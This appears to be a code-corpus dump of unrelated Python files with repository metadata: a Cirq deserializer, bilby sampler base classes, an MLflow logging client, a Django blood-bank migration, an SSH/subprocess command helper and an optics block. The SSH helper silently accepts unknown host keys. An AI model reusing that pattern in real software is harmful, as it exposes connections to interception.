arg_func_langs.arg_from_proto(
entry.key, arg_function_language=arg_function_language
): arg_func_langs.arg_from_proto(
entry.value, arg_function_language=arg_function_language
)
for entry in proto.arg_map.entries
}
for arg in arg_map.keys():
if not isinstance(arg, (str, sympy.Symbol)):
raise ValueError(
'Invalid key parameter type in deserialized CircuitOperation. '
f'Expected str or sympy.Symbol, found {type(arg)}.'
f'\nFull arg: {arg}'
)
for arg in arg_map.values():
if not isinstance(arg, (str, sympy.Symbol, float, int)):
raise ValueError(
'Invalid value parameter type in deserialized CircuitOperation. '
f'Expected str, sympy.Symbol, or number; found {type(arg)}.'
f'\nFull arg: {arg}'
)
return cirq.CircuitOperation(
circuit,
repetitions,
qubit_map,
measurement_key_map,
arg_map, # type: ignore
rep_ids,
)
# pylint: enable=missing-raises-doc
| 38.501529 | 98 | 0.625894 |
5e25a7e54247fa0dcc7f5e9841e308bbfd071173 | 24,768 | py | Python | bilby/core/sampler/base_sampler.py | LBJ-Wade/bilby | b1e02f1dfae03d4939cae9c95eff300c22919689 | [
"MIT"
] | 31 | 2019-02-28T00:48:23.000Z | 2022-03-29T09:41:28.000Z | bilby/core/sampler/base_sampler.py | LBJ-Wade/bilby | b1e02f1dfae03d4939cae9c95eff300c22919689 | [
"MIT"
] | 8 | 2018-12-27T09:15:03.000Z | 2022-03-28T19:02:10.000Z | bilby/core/sampler/base_sampler.py | LBJ-Wade/bilby | b1e02f1dfae03d4939cae9c95eff300c22919689 | [
"MIT"
] | 32 | 2018-11-30T00:58:53.000Z | 2022-03-29T09:41:30.000Z | import datetime
import distutils.dir_util
import numpy as np
import os
import tempfile
from pandas import DataFrame
from ..utils import logger, check_directory_exists_and_if_not_mkdir, command_line_args, Counter
from ..prior import Prior, PriorDict, DeltaFunction, Constraint
from ..result import Result, read_in_result
class Sampler(object):
""" A sampler object to aid in setting up an inference run
Parameters
==========
likelihood: likelihood.Likelihood
A object with a log_l method
priors: bilby.core.prior.PriorDict, dict
Priors to be used in the search.
This has attributes for each parameter to be sampled.
external_sampler: str, Sampler, optional
A string containing the module name of the sampler or an instance of
this class
outdir: str, optional
Name of the output directory
label: str, optional
Naming scheme of the output files
use_ratio: bool, optional
Switch to set whether or not you want to use the log-likelihood ratio
or just the log-likelihood
plot: bool, optional
Switch to set whether or not you want to create traceplots
injection_parameters:
A dictionary of the injection parameters
meta_data:
A dictionary of extra meta data to store in the result
result_class: bilby.core.result.Result, or child of
The result class to use. By default, `bilby.core.result.Result` is used,
but objects which inherit from this class can be given providing
additional methods.
soft_init: bool, optional
Switch to enable a soft initialization that prevents the likelihood
from being tested before running the sampler. This is relevant when
using custom likelihoods that must NOT be initialized on the main thread
when using multiprocessing, e.g. when using tensorflow in the likelihood.
**kwargs: dict
Additional keyword arguments
Attributes
==========
likelihood: likelihood.Likelihood
A object with a log_l method
priors: bilby.core.prior.PriorDict
Priors to be used in the search.
This has attributes for each parameter to be sampled.
external_sampler: Module
An external module containing an implementation of a sampler.
outdir: str
Name of the output directory
label: str
Naming scheme of the output files
use_ratio: bool
Switch to set whether or not you want to use the log-likelihood ratio
or just the log-likelihood
plot: bool
Switch to set whether or not you want to create traceplots
skip_import_verification: bool
Skips the check if the sampler is installed if true. This is
only advisable for testing environments
result: bilby.core.result.Result
Container for the results of the sampling run
exit_code: int
System exit code to return on interrupt
kwargs: dict
Dictionary of keyword arguments that can be used in the external sampler
Raises
======
TypeError:
If external_sampler is neither a string nor an instance of this class
If not all likelihood.parameters have been defined
ImportError:
If the external_sampler string does not refer to a sampler that is
installed on this system
AttributeError:
If some of the priors can't be sampled
"""
default_kwargs = dict()
npool_equiv_kwargs = ['queue_size', 'threads', 'nthreads', 'npool']
def __init__(
self, likelihood, priors, outdir='outdir', label='label',
use_ratio=False, plot=False, skip_import_verification=False,
injection_parameters=None, meta_data=None, result_class=None,
likelihood_benchmark=False, soft_init=False, exit_code=130,
**kwargs):
self.likelihood = likelihood
if isinstance(priors, PriorDict):
self.priors = priors
else:
self.priors = PriorDict(priors)
self.label = label
self.outdir = outdir
self.injection_parameters = injection_parameters
self.meta_data = meta_data
self.use_ratio = use_ratio
if not skip_import_verification:
self._verify_external_sampler()
self.external_sampler_function = None
self.plot = plot
self.likelihood_benchmark = likelihood_benchmark
self._search_parameter_keys = list()
self._fixed_parameter_keys = list()
self._constraint_parameter_keys = list()
self._initialise_parameters()
self.exit_code = exit_code
if not soft_init:
self._verify_parameters()
self._time_likelihood()
self._verify_use_ratio()
self.kwargs = kwargs
self._check_cached_result()
self._log_summary_for_sampler()
self.result = self._initialise_result(result_class)
self.likelihood_count = None
if self.likelihood_benchmark:
self.likelihood_count = Counter()
@property
def search_parameter_keys(self):
"""list: List of parameter keys that are being sampled"""
return self._search_parameter_keys
@property
def fixed_parameter_keys(self):
"""list: List of parameter keys that are not being sampled"""
return self._fixed_parameter_keys
@property
def constraint_parameter_keys(self):
"""list: List of parameters providing prior constraints"""
return self._constraint_parameter_keys
@property
def ndim(self):
"""int: Number of dimensions of the search parameter space"""
return len(self._search_parameter_keys)
@property
def kwargs(self):
"""dict: Container for the kwargs. Has more sophisticated logic in subclasses """
return self._kwargs
@kwargs.setter
def kwargs(self, kwargs):
self._kwargs = self.default_kwargs.copy()
self._translate_kwargs(kwargs)
self._kwargs.update(kwargs)
self._verify_kwargs_against_default_kwargs()
def _translate_kwargs(self, kwargs):
""" Template for child classes """
pass
@property
def external_sampler_name(self):
return self.__class__.__name__.lower()
def _verify_external_sampler(self):
external_sampler_name = self.external_sampler_name
try:
self.external_sampler = __import__(external_sampler_name)
except (ImportError, SystemExit):
raise SamplerNotInstalledError(
"Sampler {} is not installed on this system".format(external_sampler_name))
def _verify_kwargs_against_default_kwargs(self):
"""
Check if the kwargs are contained in the list of available arguments
of the external sampler.
"""
args = self.default_kwargs
bad_keys = []
for user_input in self.kwargs.keys():
if user_input not in args:
logger.warning(
"Supplied argument '{}' not an argument of '{}', removing."
.format(user_input, self.__class__.__name__))
bad_keys.append(user_input)
for key in bad_keys:
self.kwargs.pop(key)
def _initialise_parameters(self):
"""
Go through the list of priors and add keys to the fixed and search
parameter key list depending on whether
the respective parameter is fixed.
"""
for key in self.priors:
if isinstance(self.priors[key], Prior) \
and self.priors[key].is_fixed is False:
self._search_parameter_keys.append(key)
elif isinstance(self.priors[key], Constraint):
self._constraint_parameter_keys.append(key)
elif isinstance(self.priors[key], DeltaFunction):
self.likelihood.parameters[key] = self.priors[key].sample()
self._fixed_parameter_keys.append(key)
logger.info("Search parameters:")
for key in self._search_parameter_keys + self._constraint_parameter_keys:
logger.info(' {} = {}'.format(key, self.priors[key]))
for key in self._fixed_parameter_keys:
logger.info(' {} = {}'.format(key, self.priors[key].peak))
def _initialise_result(self, result_class):
"""
Returns
=======
bilby.core.result.Result: An initial template for the result
"""
result_kwargs = dict(
label=self.label, outdir=self.outdir,
sampler=self.__class__.__name__.lower(),
search_parameter_keys=self._search_parameter_keys,
fixed_parameter_keys=self._fixed_parameter_keys,
constraint_parameter_keys=self._constraint_parameter_keys,
priors=self.priors, meta_data=self.meta_data,
injection_parameters=self.injection_parameters,
sampler_kwargs=self.kwargs, use_ratio=self.use_ratio)
if result_class is None:
result = Result(**result_kwargs)
elif issubclass(result_class, Result):
result = result_class(**result_kwargs)
else:
raise ValueError(
"Input result_class={} not understood".format(result_class))
return result
def _verify_parameters(self):
""" Evaluate a set of parameters drawn from the prior
Tests if the likelihood evaluation passes
Raises
======
TypeError
Likelihood can't be evaluated.
"""
if self.priors.test_has_redundant_keys():
raise IllegalSamplingSetError(
"Your sampling set contains redundant parameters.")
theta = self.priors.sample_subset_constrained_as_array(
self.search_parameter_keys, size=1)[:, 0]
try:
self.log_likelihood(theta)
except TypeError as e:
raise TypeError(
"Likelihood evaluation failed with message: \n'{}'\n"
"Have you specified all the parameters:\n{}"
.format(e, self.likelihood.parameters))
def _time_likelihood(self, n_evaluations=100):
""" Times the likelihood evaluation and print an info message
Parameters
==========
n_evaluations: int
The number of evaluations to estimate the evaluation time from
"""
t1 = datetime.datetime.now()
for _ in range(n_evaluations):
theta = self.priors.sample_subset_constrained_as_array(
self._search_parameter_keys, size=1)[:, 0]
self.log_likelihood(theta)
total_time = (datetime.datetime.now() - t1).total_seconds()
self._log_likelihood_eval_time = total_time / n_evaluations
if self._log_likelihood_eval_time == 0:
self._log_likelihood_eval_time = np.nan
logger.info("Unable to measure single likelihood time")
else:
logger.info("Single likelihood evaluation took {:.3e} s"
.format(self._log_likelihood_eval_time))
def _verify_use_ratio(self):
"""
Checks if use_ratio is set. Prints a warning if use_ratio is set but
not properly implemented.
"""
try:
self.priors.sample_subset(self.search_parameter_keys)
except (KeyError, AttributeError):
logger.error("Cannot sample from priors with keys: {}.".format(
self.search_parameter_keys
))
raise
if self.use_ratio is False:
logger.debug("use_ratio set to False")
return
ratio_is_nan = np.isnan(self.likelihood.log_likelihood_ratio())
if self.use_ratio is True and ratio_is_nan:
logger.warning(
"You have requested to use the loglikelihood_ratio, but it "
" returns a NaN")
elif self.use_ratio is None and not ratio_is_nan:
logger.debug(
"use_ratio not spec. but gives valid answer, setting True")
self.use_ratio = True
def prior_transform(self, theta):
""" Prior transform method that is passed into the external sampler.
Parameters
==========
theta: list
List of sampled values on a unit interval
Returns
=======
list: Properly rescaled sampled values
"""
return self.priors.rescale(self._search_parameter_keys, theta)
def log_prior(self, theta):
"""
Parameters
==========
theta: list
List of sampled values on a unit interval
Returns
=======
float: Joint ln prior probability of theta
"""
params = {
key: t for key, t in zip(self._search_parameter_keys, theta)}
return self.priors.ln_prob(params)
def log_likelihood(self, theta):
"""
Parameters
==========
theta: list
List of values for the likelihood parameters
Returns
=======
float: Log-likelihood or log-likelihood-ratio given the current
likelihood.parameter values
"""
if self.likelihood_benchmark:
try:
self.likelihood_count.increment()
except AttributeError:
pass
params = {
key: t for key, t in zip(self._search_parameter_keys, theta)}
self.likelihood.parameters.update(params)
if self.use_ratio:
return self.likelihood.log_likelihood_ratio()
else:
return self.likelihood.log_likelihood()
def get_random_draw_from_prior(self):
""" Get a random draw from the prior distribution
Returns
=======
draw: array_like
An ndim-length array of values drawn from the prior. Parameters
with delta-function (or fixed) priors are not returned
"""
new_sample = self.priors.sample()
draw = np.array(list(new_sample[key]
for key in self._search_parameter_keys))
self.check_draw(draw)
return draw
def get_initial_points_from_prior(self, npoints=1):
""" Method to draw a set of live points from the prior
This iterates over draws from the prior until all the samples have a
finite prior and likelihood (relevant for constrained priors).
Parameters
==========
npoints: int
The number of values to return
Returns
=======
unit_cube, parameters, likelihood: tuple of array_like
unit_cube (nlive, ndim) is an array of the prior samples from the
unit cube, parameters (nlive, ndim) is the unit_cube array
transformed to the target space, while likelihood (nlive) are the
likelihood evaluations.
"""
logger.info("Generating initial points from the prior")
unit_cube = []
parameters = []
likelihood = []
while len(unit_cube) < npoints:
unit = np.random.rand(self.ndim)
theta = self.prior_transform(unit)
if self.check_draw(theta, warning=False):
unit_cube.append(unit)
parameters.append(theta)
likelihood.append(self.log_likelihood(theta))
return np.array(unit_cube), np.array(parameters), np.array(likelihood)
def check_draw(self, theta, warning=True):
"""
Checks if the draw will generate an infinite prior or likelihood
Also catches the output of `numpy.nan_to_num`.
Parameters
==========
theta: array_like
Parameter values at which to evaluate likelihood
warning: bool
Whether or not to print a warning
Returns
=======
bool, cube (nlive,
True if the likelihood and prior are finite, false otherwise
"""
log_p = self.log_prior(theta)
log_l = self.log_likelihood(theta)
return \
self._check_bad_value(val=log_p, warning=warning, theta=theta, label='prior') and \
self._check_bad_value(val=log_l, warning=warning, theta=theta, label='likelihood')
@staticmethod
def _check_bad_value(val, warning, theta, label):
val = np.abs(val)
bad_values = [np.inf, np.nan_to_num(np.inf)]
if val in bad_values or np.isnan(val):
if warning:
logger.warning(f'Prior draw {theta} has inf {label}')
return False
return True
def run_sampler(self):
"""A template method to run in subclasses"""
pass
def _run_test(self):
"""
TODO: Implement this method
Raises
=======
ValueError: in any case
"""
raise ValueError("Method not yet implemented")
def _check_cached_result(self):
""" Check if the cached data file exists and can be used """
if command_line_args.clean:
logger.debug("Command line argument clean given, forcing rerun")
self.cached_result = None
return
try:
self.cached_result = read_in_result(
outdir=self.outdir, label=self.label)
except IOError:
self.cached_result = None
if command_line_args.use_cached:
logger.debug(
"Command line argument cached given, no cache check performed")
return
logger.debug("Checking cached data")
if self.cached_result:
check_keys = ['search_parameter_keys', 'fixed_parameter_keys',
'kwargs']
use_cache = True
for key in check_keys:
if self.cached_result._check_attribute_match_to_other_object(
key, self) is False:
logger.debug("Cached value {} is unmatched".format(key))
use_cache = False
if use_cache is False:
self.cached_result = None
def _log_summary_for_sampler(self):
"""Print a summary of the sampler used and its kwargs"""
if self.cached_result is None:
kwargs_print = self.kwargs.copy()
for k in kwargs_print:
if type(kwargs_print[k]) in (list, np.ndarray):
array_repr = np.array(kwargs_print[k])
if array_repr.size > 10:
kwargs_print[k] = ('array_like, shape={}'
.format(array_repr.shape))
elif type(kwargs_print[k]) == DataFrame:
kwargs_print[k] = ('DataFrame, shape={}'
.format(kwargs_print[k].shape))
logger.info("Using sampler {} with kwargs {}".format(
self.__class__.__name__, kwargs_print))
def calc_likelihood_count(self):
if self.likelihood_benchmark:
self.result.num_likelihood_evaluations = self.likelihood_count.value
else:
return None
class NestedSampler(Sampler):
npoints_equiv_kwargs = ['nlive', 'nlives', 'n_live_points', 'npoints',
'npoint', 'Nlive', 'num_live_points', 'num_particles']
walks_equiv_kwargs = ['walks', 'steps', 'nmcmc']
def reorder_loglikelihoods(self, unsorted_loglikelihoods, unsorted_samples,
sorted_samples):
""" Reorders the stored log-likelihood after they have been reweighted
This creates a sorting index by matching the reweights `result.samples`
against the raw samples, then uses this index to sort the
loglikelihoods
Parameters
==========
sorted_samples, unsorted_samples: array-like
Sorted and unsorted values of the samples. These should be of the
same shape and contain the same sample values, but in different
orders
unsorted_loglikelihoods: array-like
The loglikelihoods corresponding to the unsorted_samples
Returns
=======
sorted_loglikelihoods: array-like
The loglikelihoods reordered to match that of the sorted_samples
"""
idxs = []
for ii in range(len(unsorted_loglikelihoods)):
idx = np.where(np.all(sorted_samples[ii] == unsorted_samples,
axis=1))[0]
if len(idx) > 1:
logger.warning(
"Multiple likelihood matches found between sorted and "
"unsorted samples. Taking the first match.")
idxs.append(idx[0])
return unsorted_loglikelihoods[idxs]
def log_likelihood(self, theta):
"""
Since some nested samplers don't call the log_prior method, evaluate
the prior constraint here.
Parameters
==========
theta: array_like
Parameter values at which to evaluate likelihood
Returns
=======
float: log_likelihood
"""
if self.priors.evaluate_constraints({
key: theta[ii] for ii, key in
enumerate(self.search_parameter_keys)}):
return Sampler.log_likelihood(self, theta)
else:
return np.nan_to_num(-np.inf)
def _setup_run_directory(self):
"""
If using a temporary directory, the output directory is moved to the
temporary directory.
Used for Dnest4, Pymultinest, and Ultranest.
"""
if self.use_temporary_directory:
temporary_outputfiles_basename = tempfile.TemporaryDirectory().name
self.temporary_outputfiles_basename = temporary_outputfiles_basename
if os.path.exists(self.outputfiles_basename):
distutils.dir_util.copy_tree(self.outputfiles_basename, self.temporary_outputfiles_basename)
check_directory_exists_and_if_not_mkdir(temporary_outputfiles_basename)
self.kwargs["outputfiles_basename"] = self.temporary_outputfiles_basename
logger.info("Using temporary file {}".format(temporary_outputfiles_basename))
else:
check_directory_exists_and_if_not_mkdir(self.outputfiles_basename)
self.kwargs["outputfiles_basename"] = self.outputfiles_basename
logger.info("Using output file {}".format(self.outputfiles_basename))
class MCMCSampler(Sampler):
nwalkers_equiv_kwargs = ['nwalker', 'nwalkers', 'draws', 'Niter']
nburn_equiv_kwargs = ['burn', 'nburn']
def print_nburn_logging_info(self):
""" Prints logging info as to how nburn was calculated """
if type(self.nburn) in [float, int]:
logger.info("Discarding {} steps for burn-in".format(self.nburn))
elif self.result.max_autocorrelation_time is None:
logger.info("Autocorrelation time not calculated, discarding {} "
" steps for burn-in".format(self.nburn))
else:
logger.info("Discarding {} steps for burn-in, estimated from "
"autocorr".format(self.nburn))
def calculate_autocorrelation(self, samples, c=3):
""" Uses the `emcee.autocorr` module to estimate the autocorrelation
Parameters
==========
samples: array_like
A chain of samples.
c: float
The minimum number of autocorrelation times needed to trust the
estimate (default: `3`). See `emcee.autocorr.integrated_time`.
"""
import emcee
try:
self.result.max_autocorrelation_time = int(np.max(
emcee.autocorr.integrated_time(samples, c=c)))
logger.info("Max autocorr time = {}".format(
self.result.max_autocorrelation_time))
except emcee.autocorr.AutocorrError as e:
self.result.max_autocorrelation_time = None
logger.info("Unable to calculate autocorr time: {}".format(e))
class Error(Exception):
""" Base class for all exceptions raised by this module """
class SamplerError(Error):
""" Base class for Error related to samplers in this module """
class ResumeError(Error):
""" Class for errors arising from resuming runs """
class SamplerNotInstalledError(SamplerError):
""" Base class for Error raised by not installed samplers """
class IllegalSamplingSetError(Error):
""" Class for illegal sets of sampling parameters """
class SamplingMarginalisedParameterError(IllegalSamplingSetError):
""" Class for errors that occur when sampling over marginalized parameters """
| 36.157664 | 108 | 0.621003 |
9b57ce6683bdfe9ba6a321d0adc3afd6618447ab | 4,639 | py | Python | nerblackbox/modules/ner_training/logging/mlflow_client.py | af-ai-center/nerblackbox | a2b751d0b74c3f4779ccf3846e35d8575b488027 | [
"Apache-2.0"
] | 11 | 2020-09-24T12:10:52.000Z | 2021-05-28T12:59:06.000Z | nerblackbox/modules/ner_training/logging/mlflow_client.py | af-ai-center/nerblackbox | a2b751d0b74c3f4779ccf3846e35d8575b488027 | [
"Apache-2.0"
] | 1 | 2020-07-03T13:13:35.000Z | 2020-07-03T13:13:35.000Z | nerblackbox/modules/ner_training/logging/mlflow_client.py | af-ai-center/nerblackbox | a2b751d0b74c3f4779ccf3846e35d8575b488027 | [
"Apache-2.0"
] | null | null | null | import mlflow
from nerblackbox.modules.experiment_config.experiment_config import ExperimentConfig
class MLflowClient:
def __init__(
self, experiment_name, run_name, log_dirs, logged_metrics, default_logger
):
"""
:param experiment_name: [str], e.g. 'Default'
:param run_name: [str], e.g. 'Default'
:param log_dirs: [Namespace], including 'mlflow_artifact' & 'default_logger_artifact'
:param logged_metrics: [list] of [str], e.g. ['all_precision_micro', 'all_precision_macro', ..]
"""
self.experiment_name = experiment_name
self.run_name = run_name
self.log_dirs = log_dirs
self.logged_metrics = logged_metrics # TODO: not used !!
self.default_logger = default_logger
@staticmethod
def log_params(params, hparams, experiment=False):
"""
mlflow hyperparameter logging
-----------------------------
:param params: [argparse.Namespace] attr: experiment_name, run_name, pretrained_model_name, dataset_name, ..
:param hparams: [argparse.Namespace] attr: batch_size, max_seq_length, max_epochs, prune_ratio_*, lr_*
:param experiment: [bool] whether run is part of an experiment w/ multiple runs
:return:
"""
if experiment:
# log only run (hyper)parameters
experiment_config = ExperimentConfig(
experiment_name=params.experiment_name,
run_name=params.run_name,
device=params.device,
fp16=params.fp16,
)
for k, v in experiment_config.get_params_and_hparams(
run_name_nr=params.run_name_nr
).items():
mlflow.log_param(k, v)
else:
# log hardcoded set of (hyper)parameters
if params is not None:
# all parameters
mlflow.log_param("parameters", vars(params))
if hparams is not None:
# all hyperparameters
mlflow.log_param("hyperparameters", vars(hparams))
# most important hyperparameters
most_important_hyperparameters = [
"prune_ratio_train",
"prune_ratio_val",
"prune_ratio_test",
"max_epochs",
"lr_max",
"lr_schedule",
]
for hyperparameter in most_important_hyperparameters:
mlflow.log_param(hyperparameter, vars(hparams)[hyperparameter])
def log_metric(self, _metric, _stopped_epoch):
mlflow.log_metric(_metric, _stopped_epoch)
def log_metrics(self, _epoch, _epoch_val_metrics):
"""
mlflow metrics logging
-----------------------------
:param: _epoch: [int]
:param: _epoch_val_metrics [dict] w/ keys 'loss', 'acc', 'f1' & values = [np array]
:return: -
"""
for metric in _epoch_val_metrics.keys():
_metric = metric.replace("[", "_").replace("]", "_")
mlflow.log_metric(_metric, _epoch_val_metrics[metric])
def log_artifact(self, _artifact: str, overwrite=False):
"""
log artifact (e.g. confusion_matrix, classification report)
------------------------------------------------------------------------------------
:param: artifact: [str]
:param: overwrite: [bool] if True, overwrite existing artifact, else append
:return: -
"""
if overwrite:
self._clear_artifact()
self._log_artifact(_artifact)
@staticmethod
def log_time(_time):
mlflow.log_metric("time", _time)
def _clear_artifact(self):
"""
mlflow artifact logging
-----------------------
:return: -
"""
with open(self.log_dirs.mlflow_file, "w") as f:
f.write(" ")
def _log_artifact(self, content):
"""
mlflow artifact logging
-----------------------
:param content: [str]
:return: -
"""
with open(self.log_dirs.mlflow_file, "a") as f:
f.write(content + "\n")
def finish_artifact_mlflow(self):
# mlflow
mlflow.log_artifact(self.log_dirs.mlflow_file)
self.default_logger.log_debug(f"mlflow file at {self.log_dirs.mlflow_file}")
def finish_artifact_logger(self):
# default logger
mlflow.log_artifact(self.log_dirs.log_file)
self.default_logger.log_debug(f"log file at {self.log_dirs.log_file}")
| 37.41129 | 120 | 0.560466 |
be421484f04c1a5a93a1b896742b58c3d06a1745 | 7,143 | py | Python | blood_bank/migrations/0001_initial.py | Matheus-IT/blood_bank_backend | 63984132509d624ffab988d77c9382bc7a6fb493 | [
"MIT"
] | null | null | null | blood_bank/migrations/0001_initial.py | Matheus-IT/blood_bank_backend | 63984132509d624ffab988d77c9382bc7a6fb493 | [
"MIT"
] | null | null | null | blood_bank/migrations/0001_initial.py | Matheus-IT/blood_bank_backend | 63984132509d624ffab988d77c9382bc7a6fb493 | [
"MIT"
] | 1 | 2022-03-11T10:32:16.000Z | 2022-03-11T10:32:16.000Z | # Generated by Django 4.0.3 on 2022-03-24 20:46
import cpf_field.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('city', models.CharField(max_length=50)),
('state', models.CharField(max_length=50)),
('street', models.CharField(max_length=50)),
('neighborhood', models.CharField(max_length=50)),
('number', models.IntegerField(null=True)),
('reference_point', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='CollectionBags',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('num_bag', models.SlugField(default='123', max_length=100, unique=True)),
],
),
migrations.CreateModel(
name='Donation',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(auto_now_add=True)),
('local', models.CharField(max_length=100)),
('real_weight', models.FloatField()),
('temperature', models.FloatField()),
('entry_time', models.DateTimeField()),
('exit_time', models.DateField()),
],
),
migrations.CreateModel(
name='Tubes',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('num_tube', models.SlugField(max_length=100, unique=True)),
],
),
migrations.CreateModel(
name='Nurse',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('telephone1', models.CharField(max_length=11)),
('telephone2', models.CharField(max_length=11, null=True)),
('address', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.address')),
],
),
migrations.CreateModel(
name='Exams',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('description', models.CharField(max_length=200)),
('state_exam', models.CharField(choices=[('y', 'exam valid'), ('n', 'exam not valid'), ('w', 'waiting exam result')], max_length=3)),
('donation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.donation')),
],
),
migrations.CreateModel(
name='Donator',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('blood_type', models.CharField(choices=[('a+', 'A positive'), ('a-', 'A negative'), ('b+', 'B positive'), ('b-', 'B negative'), ('ab+', 'AB positive'), ('ab-', 'AB negative'), ('o+', 'O positive'), ('o-', 'O negative')], max_length=3)),
('telephone1', models.CharField(max_length=11)),
('telephone2', models.CharField(max_length=11, null=True)),
('birth_date', models.DateField()),
('address', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.address')),
],
),
migrations.AddField(
model_name='donation',
name='donator',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.donator'),
),
migrations.AddField(
model_name='donation',
name='nurse',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.nurse'),
),
migrations.AddField(
model_name='donation',
name='serial_number_collection_bag',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.collectionbags'),
),
migrations.AddField(
model_name='donation',
name='test_tube',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.tubes'),
),
migrations.CreateModel(
name='Allergies',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.CharField(choices=[('res', 'respiratory allergies'), ('ski', 'skin allergies'), ('eye', 'eye allergies'), ('foo', 'food allergies'), ('dru', 'drug allergies')], max_length=3)),
('subject', models.CharField(max_length=30)),
('donator', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='blood_bank.donator')),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('name', models.CharField(max_length=250)),
('email', models.EmailField(max_length=250, unique=True)),
('cpf', cpf_field.models.CPFField(max_length=11)),
('user_type', models.CharField(choices=[('don', 'donator'), ('nur', 'nurse'), ('adm', 'admin')], max_length=3)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| 52.911111 | 266 | 0.582668 |
22047731f787363cd5b86c7e981c78f0b50669f6 | 1,197 | py | Python | armada_backend/remote.py | firesoft/armada | 245115fcf21d988db5da71f18b3123479de5f2c1 | [
"Apache-2.0"
] | 281 | 2015-07-08T12:52:19.000Z | 2022-01-14T22:56:25.000Z | armada_backend/remote.py | firesoft/armada | 245115fcf21d988db5da71f18b3123479de5f2c1 | [
"Apache-2.0"
] | 15 | 2015-08-03T14:54:30.000Z | 2021-01-27T12:30:06.000Z | armada_backend/remote.py | firesoft/armada | 245115fcf21d988db5da71f18b3123479de5f2c1 | [
"Apache-2.0"
] | 39 | 2015-07-13T14:43:44.000Z | 2022-01-12T15:41:32.000Z | import subprocess
def execute_local_command(command):
p = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
out, err = p.communicate()
return p.returncode, out, err
def execute_remote_command(remote_address, command):
import paramiko
class SilentPolicy(paramiko.WarningPolicy):
def missing_host_key(self, client, hostname, key):
pass
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(SilentPolicy())
ssh_key = paramiko.RSAKey.from_private_key_file(remote_address['ssh_key'])
ssh.connect(remote_address['host'], username=remote_address['user'], pkey=ssh_key, port=int(remote_address['port']),
timeout=10)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(command)
ssh_out = ssh_stdout.read()
ssh_err = ssh_stderr.read()
ssh_return_code = ssh_stdout.channel.recv_exit_status()
ssh.close()
return ssh_return_code, ssh_out, ssh_err
def execute_command(command, remote_address=None):
if remote_address:
return execute_remote_command(remote_address, command)
return execute_local_command(command)
| 30.692308 | 120 | 0.711779 |
e19bc924e042affb25fa695da8f1634cf360c285 | 266 | py | Python | gameProject/gameApp/urls.py | cs-fullstack-2019-spring/django-mini-project4-carlos-clyde | 78dadb69cf5ec83c0c3801f30b7853338887c542 | [
"Apache-2.0"
] | null | null | null | gameProject/gameApp/urls.py | cs-fullstack-2019-spring/django-mini-project4-carlos-clyde | 78dadb69cf5ec83c0c3801f30b7853338887c542 | [
"Apache-2.0"
] | null | null | null | gameProject/gameApp/urls.py | cs-fullstack-2019-spring/django-mini-project4-carlos-clyde | 78dadb69cf5ec83c0c3801f30b7853338887c542 | [
"Apache-2.0"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('login/', views.login, name='login'),
path('createuser/', views.newuser, name='newuser'),
path('addgame/',views.newgame, name='newgame')
]
| 20.461538 | 55 | 0.646617 |
5f0b338bee7d415e6e8cd6f4fb554f4bc4fa722c | 2,531 | py | Python | arch/blocks/electro_optics.py | bigphoton/arch | 95a197d6b89bc2316b0d88b2b1345cbbb90088ec | [
"Unlicense"
] | null | null | null | arch/blocks/electro_optics.py | bigphoton/arch | 95a197d6b89bc2316b0d88b2b1345cbbb90088ec | [
"Unlicense"
] | null | null | null | arch/blocks/electro_optics.py | bigphoton/arch | 95a197d6b89bc2316b0d88b2b1345cbbb90088ec | [
"Unlicense"
] | null | null | null | """
Functions and objects describing electro-optic components.
"""
from arch.block import Block
from arch.models.model import Linear, SymbolicModel
from sympy import Matrix, sqrt, exp, I, pi
import arch.port as port
class Switch2x2(Block):
"""
extinction_ratio: ratio of desired signal to undesired signal from wrong port
loss_dB: positive number of decibels of loss (0 dB -> 100% tx; 10 dB -> 10% tx)
"""
reference_prefix = "SW"
def define(self, loss_dB = 3.0, extinction_ratio=1000.0):
